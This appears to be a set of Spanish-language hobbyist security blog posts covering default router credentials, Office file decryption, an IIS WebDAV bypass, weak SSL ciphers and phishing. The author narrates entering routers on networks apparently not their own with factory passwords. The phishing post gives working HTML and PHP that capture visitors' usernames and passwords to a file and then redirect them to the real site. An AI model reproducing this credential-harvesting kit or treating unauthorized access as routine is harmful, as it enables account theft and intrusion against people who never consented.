Mostrando entradas con la etiqueta Fuerza Bruta. Mostrar todas las entradas
Mostrando entradas con la etiqueta Fuerza Bruta. Mostrar todas las entradas

Linksys

En estos dias he estado viendo cuan vulnerable puede ser un ruteador Linksys de Cisco. Me conecte a tres. De los tres puse la dirección del ruteador para entrar e investigar sus credenciales. Cuando verifico el primero solo con ponerle las credenciales administrativas por defecto las cuales eran Username: Password:admin. El segundo me conecte y entre la dirección privada del ruteador pero no me funcionaron las pasadas credenciales asi que trate y me funcionaron estas Username:admin Password:admin. Luego entre en el otro y trate con las primeras credenciales y me funcionaron a la perfección. Esto demuestra que si al comprar un rutedor nuevo no se le cambian las credenciales de fábrica, ciertas personas podrían entrar e incluso poner o cambiar la contraseña WEP.

*NOTA:cuando me refiero a es que ese espacio lo deje en blanco, osea sin poner algo.

Decryptum

He estado buscando como decriptar un archivo de Microsoft Office sin tener que bajar ningun programa. Encontre esta pagina que se llama Decryptum este puede decriptar cualquier archivo en menos de 2 minutos. La unica desventaja es que es solo para archivos Microsoft Office 2003 y solo los de Excel y Word. Si deseas el archivo completo debes pagar $29.00 dolares.

WebDAV Permitido

WebDav es un protocolo por el cual una persona remotamente puede acceder a un servidor y añadir o cambiar su contenido. Osea, que si a cierta persona se le ocurre ponerse a adivinar la contraseña de un servidor y la adivina esta, toma total control del mismo. El 21 Mayo una persona encontro que podia traspasar los limites de autenticación remotos. Osea entrar al servidor sin siquiera saber la contraseña o imaginarse el nombre de usuario. Esto nos indica una vez mas que nada es seguro.

Aqui les dejo como explotar la vulnerabilidad. Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)

SSL Débil De Cifra

Esta vez se trata de presumir que hay seguridad. De decir: "claro usamos SSL para cifrar nuestras conexiones y evitar Escuchas espien el contenido que busca." ¿Pero realmente el SSL da seguridad? Auditando el portal encontre que existe el SSL en el pero su cifrado es débil este es el informe acerca de esta vulnerabilidad.

Server

Details

Weak SSL ciphers (SSL2 on port 443):

SSL2_CK_RC4_128_EXPORT40_WITH_MD5 - Low strength
SSL2_CK_RC2_128_CBC_EXPORT40_WITH_MD5 - Low strength
SSL2_CK_DES_64_CBC_WITH_MD5 - Low strength

Server

Details

Weak SSL ciphers (SSL3 on port 443):

SSL3_CK_RSA_RC2_40_MD5 - Low strength
SSL3_CK_RSA_DES_40_CBC_SHA - Low strength
SSL3_CK_RSA_DES_64_CBC_SHA - Low strength
SSL3_CK_EDH_RSA_DES_40_CBC_SHA - Low strength
SSL3_CK_EDH_RSA_DES_64_CBC_SHA - Low strength

Server

Details

Weak SSL ciphers (TLS1 on port 443):

TLS1_CK_RSA_EXPORT_WITH_RC4_40_MD5 - Low strength
TLS1_CK_RSA_EXPORT_WITH_RC2_CBC_40_MD5 - Low strength
TLS1_CK_RSA_EXPORT_WITH_DES40_CBC_SHA - Low strength
TLS1_CK_RSA_WITH_DES_CBC_SHA - Low strength
TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA - Low strength
TLS1_CK_DHE_RSA_WITH_DES_CBC_SHA - Low strength


Esto es una vista de como aparece elreporte hacerca de esto. Recuerden no todo lo que brilla es oro asi que debemos cuidarnos de portales que reclamen tener gran seguridad que en realidad no ofrecen.

Contraseña Débil

Este es el mensaje que me da el buscador de vulnerabilidades. Se debe a que el servidor de correos POP3 del portal del cual hemos estado hablando en pasadas entradas. Cuando se reviso el portal se encontro que tenia una contraseña muy debil y el servidor se puede ver afectado por esta vulnerabilidad.
Asi se ve el reporte:
Username: sa, Password: sa

Esto nos enseña que deberiamos usar contraseñas mas fuertes y que no sean iguales al nombre de usuario.

Pescando

Phishing es una de las tecnicas usadas en la red para falsificar una pagina autentica para robar informacion confidencial de una o mas personas. Esto se lleva acabo mediante cierta persona que va a la pagina legitima, copia el codigo fuente de esta presionando la combinacion de teclas Ctrl+U y copiando el codigo fuente aun nuevo archivo de extension .html. Luego cambiando en el codigo fuente para nombre de usuario:

<p><label for="username">Email:</label>
<input name="username" type="text" id="username" size="20" /></p>

y para contraseña:

<p><label for="password">Password:</label>
<input name="password" id="password" size="20" type="password"></p>
Luego se crea un archivo .php con la siguiente informacion:




<?php
$name = $_POST["username"];
$pass = $_POST["password"];
$fl = fopen('POST.html', 'a');
fwrite($fl, "" .$name. ":" .$pass. "<BR><BR>");
fclose($fl);
header( 'Location: http://www.pagina a redirigir.com' ) ;
?>

En donde pagina a redirigir seria la pagina a la que despues de que el usuario a introducido su contraseña en el portal falso lo redirigira al portal en la red autentico. Guardamos el archivo con el nombre: archivo.php Despues de haber creado y editado los dos archivos vamos al archivo .html y escribimos el nombre que le dimos al archivo .php:

<form action="archivo.php" method="post">

Donde archivo.php es el archivo .php donde se llevara el nombre de usuario y la contraseña a POST.html.

Este es basicamente el modo en el que se crea una pagina para "pescar" a la gente. Para salvarnos de una de ellas siempre verifiquemos el URL y si la conexion esta siendo llevada acabo por SSL o https.

Desenredar


Hace algunos dias estaba navegando por una red y se me ocurrio entrar en su ruteador. Tecle 192.168.1.2. Encontre que en los espacios para llenar el nombre de usuario y la contraseña. Yo pensaba en empesar a adivinar el nobre de usuario y la contraseña, pero para mi sorpresa el nombre de usuario admin ya estaba escrito. Sistemas de codigo abierto como Untangle son muy inseguros. Incluso tiene un buen filtro de busqueda para niños o empleados vagos, pero este puede ser burlado por cierta persona clasica que le haga una jaqueca y adivine el password. El filtro y toda la informacion qur viaja atravez del ruteador puede ser comprometida por esta cierta persona. Hay que tener cuidado con que herramientas se trabaja en ruteadores publicos o privados ya que este, tu red e incluso tu computadora pueden ser explotados por cierta persona.